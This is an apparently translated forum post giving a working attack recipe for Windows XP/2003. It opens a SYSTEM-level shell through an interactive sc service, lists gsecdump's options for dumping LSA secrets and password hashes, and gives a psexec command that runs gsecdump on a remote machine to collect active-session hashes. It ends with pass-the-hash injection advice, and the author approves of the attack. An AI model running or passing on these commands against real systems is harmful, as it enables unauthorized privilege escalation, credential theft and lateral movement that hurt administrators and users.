To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------

The 1053 error is expected: cmd.exe never registers with the Service Control Manager, so the start request times out, but by then the interactive service has already put a console on the desktop, and the "/K start" opens a second cmd.exe that outlives the service process. This depends on interactive services (type= interact) being allowed to reach the logged-on desktop, which is the case on XP/2003; Session 0 isolation on Vista and later keeps that window off the user's desktop.

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system. Here -s runs gsecdump as SYSTEM on the target, -c copies the executable over and -f forces the copy even if a copy already exists; the redirection captures gsecdump's output in a local file.

These are a lot better than a cachedump of the cached domain credentials, because these are LM hashes, which can be broken easily with rainbow tables.

A tip: iam from the pshtoolkit package can take the hashes gsecdump just dumped and inject them into the local lsass process, giving a hash-injection (pass-the-hash) attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes picked up during ARP spoofing, or with gethash, really do not need to be cracked at all; it is just a matter of using the tool. As the original article puts it so well, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.